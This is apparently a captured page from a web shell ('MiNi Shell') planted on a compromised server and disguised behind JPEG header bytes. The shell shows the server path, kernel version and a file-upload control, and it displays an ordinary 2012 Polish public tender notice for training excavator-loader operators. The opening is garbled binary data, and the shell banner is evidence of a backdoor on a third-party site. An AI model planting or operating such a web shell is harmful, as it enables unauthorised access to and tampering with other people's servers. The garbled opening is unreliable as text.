JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120417/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120417/121304-N-2012.html

<p class="kh_header"><b>Nowy Sącz: Operator koparko-ładowarki klasy III</b><br>
<b>Numer ogłoszenia: 121304 - 2012; data zamieszczenia: 17.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Sadecki Urząd Pracy , ul. Węgierska 146, 33-300 Nowy Sącz, woj. małopolskie, tel. 018 4429110, faks 018 4429984.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sup.nowysacz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Operator koparko-ładowarki klasy III.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest przygotowanie i przeprowadzenie szkolenia dla 15 osób bezrobotnych pn. Operator koparko-ładowarki klasy III w ramach jednej edycji kursowej wraz z egzaminem.
2. Celem szkolenia jest przygotowanie kursantów do uzyskania uprawnień operatora koparko-ładowarki klasy III.
3. Poprzez przygotowanie i przeprowadzenie szkolenia rozumie się w szczególności obowiązki Wykonawcy w zakresie:
a) Opracowania programu szkolenia zgodnego z programem nauczania Instytutu Mechanizacji, Budownictwa i Górnictwa Skalnego w Warszawie, Centrum Szkolenia Operatorów Maszyn. Program szkolenia musi być sporządzony zgodnie z Rozporządzeniem Ministra Pracy i Polityki Społecznej z dnia 14 września 2010 r. 
w sprawie standardów i warunków prowadzenia usług rynku pracy (Dz. U. z  2010 r. nr 177, poz. 1193 z późn. zm. ) według wzoru na Załączniku nr 2 do SIWZ.
b) Ustalenie miejsca (lokalizacji) zajęć.
c) Zapewnienie sali dydaktycznej przystosowanej do wielkości 15 osobowej grupy  (wykłady) oraz placu i frontu robót do zajęć praktycznych.
d) Zapewnienie niezbędnego sprzętu umożliwiającego sprawne prowadzenie szkolenia (rzutnika, notebook/komputera, flipcharta, itp.), niezbędnych mebli biurowych (stoły, krzesła) oraz minimum 2 koparko - ładowarek do przeprowadzenia części praktycznej szkolenia.
e) Przeprowadzenie szkolenia zgodnie z programem oraz wydanie na podstawie rozporządzenia Ministra Gospodarki z dnia 20 września 2001 r. w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych budowlanych i drogowych ( Dz.U. Nr 118, poz. 1263 z 2001 r. ) książek operatora maszyn roboczych i świadectw potwierdzających pozytywny wynik sprawdzianu na uprawnienia operatora oraz zaświadczeń lub innych dokumentów potwierdzających ukończenie szkolenia i uzyskanie kwalifikacji.
f) Prowadzenia dokumentacji kursu tj. dziennika zajęć edukacyjnych, listy obecności, protokołu z egzaminu, rejestru wydawanych zaświadczeń lub innych dokumentów potwierdzających ukończenie szkolenia i uzyskanie kwalifikacji,  ankiet oceny szkolenia dla uczestników i absolwentów szkolenia.
g) Ubezpieczenia od następstw nieszczęśliwych wypadków powstałych w związku ze szkoleniem oraz w drodze do miejsca szkolenia i z powrotem osoby, które:
-w okresie szkolenia nie posiadają ubezpieczenia od następstw nieszczęśliwych wypadków z tytułu posiadania prawa do stypendium szkoleniowego (przewidywane 2 osoby),
Wykaz osób, które należy objąć w/w ubezpieczeniem na czas trwania całego szkolenia Zamawiający zobowiązuje się przekazać Wykonawcy najpóźniej do dnia rozpoczęcia szkolenia.
-kontynuują szkolenie po podjęciu zatrudnienia, innej pracy zarobkowej lub działalności gospodarczej.
h) Zapewnienie dwóch przerw kawowych (zimne i gorące napoje, poczęstunek).


4. Wymagania dotyczące sposobu realizacji zamówienia:
a) Miejsce realizacji szkolenia: Miasto Nowy Sącz lub Powiat Nowosądecki. 
W przypadku szkolenia poza miastem Nowy Sącz w cenie szkolenia należy uwzględnić koszty przejazdu uczestników szkolenia.
b) Czas trwania szkolenia - maksymalnie 27 dni roboczych.
c) Liczba godzin szkoleniowych wynosi 202 godziny  zegarowe w tym 116 godzin zajęć teoretycznych i 86 godzin zajęć praktycznych. Po zakończeniu 202 godzin zajęć, w ostatnim dniu  szkolenia musi być przeprowadzony  egzamin przez Państwową Komisję Egzaminacyjną powołaną przez Instytut Mechanizacji, Budownictwa i Górnictwa Skalnego. Liczba godzin zajęć w tygodniu obejmuje przeciętnie nie mniej niż 25 godzin zegarowych, dziennie nie może przekraczać 8 godzin zegarowych. Godzina zegarowa kursu liczy 60 minut i obejmuje zajęcia edukacyjne liczące 45 minut oraz przerwę, liczącą średnio 15 minut (długość przerw może być ustalona elastycznie). Zajęcia teoretyczne i praktyczne trwają  
w układzie poniedziałek - piątek w godzinach od 8.00 maksymalnie do 18.00. 
d) W ostatnim dniu szkolenia musi być przeprowadzony egzamin przez Państwową Komisję Egzaminacyjną powołaną przez Instytut Mechanizacji, Budownictwa i Górnictwa Skalnego.
e) Wykonawca musi zapewnić materiały dydaktyczne dla każdego uczestnika szkolenia (obowiązkowo w formie papierowej, a w przypadku posiadania materiałów w formie elektronicznej również w tej formie) oraz przekazać komplet materiałów wydawanych kursantom dla SUP (forma papierowa lub CD). 
f) Wykonawca zobowiązany jest w czasie wykonywania usługi przestrzegać przepisów BHP i p. poż.
g) Wykonawca zobowiązuje się do przestrzegania przepisów ustawy z dnia 29.08.1997 r. o ochronie danych osobowych ( Dz.U. z 2002 r. nr 101 poz. 926 z późn. zm.) Wykonawca może przetwarzać dane osobowe uczestników szkolenia wyłącznie w zakresie i celu niezbędnym do realizacji niniejszego zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 27.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający na potwierdzenie spełniania warunku udziału w postępowaniu wymaga złożenia kserokopii potwierdzonej za zgodność z oryginałem przez Wykonawcę lub osobę upoważnioną (z zachowaniem sposobu reprezentacji) zgody Instytutu Mechanizacji Budownictwa i Górnictwa Skalnego w Warszawie na organizowanie szkoleń w specjalności objętej zamówieniem. Ocenę spełniania warunku w postępowaniu Zamawiający przeprowadzi na podstawie załączonego do oferty dokumentu, metodą spełnia/nie spełnia (Załącznik nr 3 do SIWZ).
Ponadto Zamawiający na potwierdzenie spełniania warunku udziału w postępowaniu wymaga również złożenia oświadczenia o posiadaniu aktualnego na dany roku kalendarzowy wpisu do Rejestru Instytucji Szkoleniowych www.ris.praca.gov.pl prowadzonego przez Wojewódzki Urząd Pracy (Załącznik nr 8). Ocenę spełniania warunku w postępowaniu Zamawiający przeprowadzi na podstawie załączonego do oferty oświadczenia, metodą spełnia/nie spełnia (Załącznik nr 3 i 8 do SIWZ) oraz poprzez sprawdzenie w systemie elektronicznym faktu posiadania aktualnego wpisu do RIS.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeśli Wykonawca wykaże minimum 1 szkolenie przeprowadzone dla co najmniej 10 osobowej grupy kursowej z zakresu odpowiadającego przedmiotowi zamówienia z podaniem: wartości, przedmiotu, dat wykonania i odbiorców,  zrealizowanych  w okresie  trzech lat przed upływem terminu składania ofert i załączy dokumenty potwierdzające, że te usługi zostały wykonane należycie. Ocenę spełniania warunku w postępowaniu Zamawiający przeprowadzi na podstawie załączonego do oferty wykazu, metodą spełnia/nie spełnia (Załącznik nr 3 i 4 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dysponowania odpowiednim potencjałem technicznym zostanie spełniony, jeżeli Wykonawca w wykazie sal i bazy sprzętowej ( Załącznik nr 5 do SIWZ) przedstawi, iż na czas realizacji szkolenia (zamówienia) będzie dysponował odpowiednią salą szkoleniową przystosowaną do prowadzenia zajęć teoretycznych dla 15 osobowej grupy kursowej, placem i frontem robót do zajęć praktycznych oraz przynajmniej dwoma koparko-ładowarkami. Wykonawca musi zapewnić niezbędny sprzęt umożliwiający sprawne prowadzenie szkolenia teoretycznego (rzutnika, notebook/komputera, flipcharta).  Ocenę spełniania warunku w postępowaniu Zamawiający przeprowadzi na podstawie załączonego do oferty wykazu, metodą spełnia/nie spełnia (Załącznik nr 3 i 5 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dysponowania osobami zdolnymi do wykonania zamówienia zostanie spełniony, jeżeli Wykonawca wskaże minimum 3 osoby, wyznaczone do realizacji niniejszego zamówienia, z których każda posiada kwalifikacje zawodowe i wykształcenie niezbędne do prowadzenia zajęć. Wskazane jest aby osoby prowadzące część praktyczną (minimum 2)   posiadały uprawnienia maszynisty ciężkich maszyn budowlanych. Powyższe informacje muszą wynikać z przedstawionego przez Wykonawcę wykazu osób, które będą uczestniczyć w realizacji zamówienia (Załącznik nr 6). Ocenę spełniania warunku w postępowaniu Zamawiający przeprowadzi na podstawie załączonego do oferty wykazu, metodą spełnia/nie spełnia (Załącznik nr 3 i 6 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocenę spełniania warunku w postępowaniu Zamawiający przeprowadzi na podstawie załączonego do oferty oświadczenia, metodą spełnia/nie spełnia (Załącznik nr 3 do SIWZ).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)  Kserokopia potwierdzona za zgodność z oryginałem przez Wykonawcę lub osobę upoważnioną (z zachowaniem sposobu reprezentacji) zgody Instytutu Mechanizacji, Budownictwa i Górnictwa Skalnego konieczna do prowadzenia szkolenia w specjalności objętej niniejszym zamówieniem,
b)  oświadczenie o aktualnym wpisie do Rejestru Instytucji Szkoleniowych zgodnie 
z Rozporządzeniem Ministra Gospodarki i Pracy z dnia 27 października 2004 r. w sprawie rejestru instytucji szkoleniowych (Dz. U. z 2004 r. nr 236 poz. 2365 z późn. zm.) (załącznik nr 8 do SIWZ),</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - Doświadczenie Wykonawcy w realizacji szkoleń z zakresu objętego przedmiotem zamówienia - 30</li>
<li>3 - Posiadanie przez instytucję szkoleniową certyfikatu jakości usług (np. ISO, akredytacja zgodna - 10</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Umowa zostanie zawarta zgodnie ze wzorem umowy stanowiącej załącznik nr 10 do SIWZ.
2. Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty na podstawie której dokonano wyboru Wykonawcy za wyjątkiem miejsca szkolenia oraz kadry dydaktycznej.
3. Usługa ma być wykonywana przez osoby wskazane w  Załącznik nr 6 do oferty  oraz w miejscu wskazanym w Załączniku nr 5 do SIWZ
4. Zmiana osoby wskazanej w ofercie będzie możliwa w następujących sytuacjach :
a) Na żądanie Zamawiającego w przypadku nienależytego wykonania powierzonej czynności;
b) Na wniosek Wykonawcy uzasadniony obiektywnymi okolicznościami po przedstawieniu i zaakceptowaniu przez Zamawiającego kandydatury innej osoby spełniającej warunki zawarte w niniejszej SIWZ.
5. Zmiana miejsca szkolenia będzie możliwa po pisemnym przedstawieniu nowych warunków oraz akceptacji Zamawiającego. 
6. W razie wystąpienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy, Zamawiający może odstąpić od umowy w terminie 30 dni od powzięcia wiadomości o powyższych okolicznościach.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://pup.nowysacz.ibip.pl/public<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Sądecki Urząd Pracy ul. Węgierska 146, 33-300 Nowy Sącz.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.04.2012 godzina 09:00, miejsce: Sądecki Urząd Pracy ul. Węgierska 146, 33-300 Nowy Sącz Biuro Obsługi Klienta pokój nr 8.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com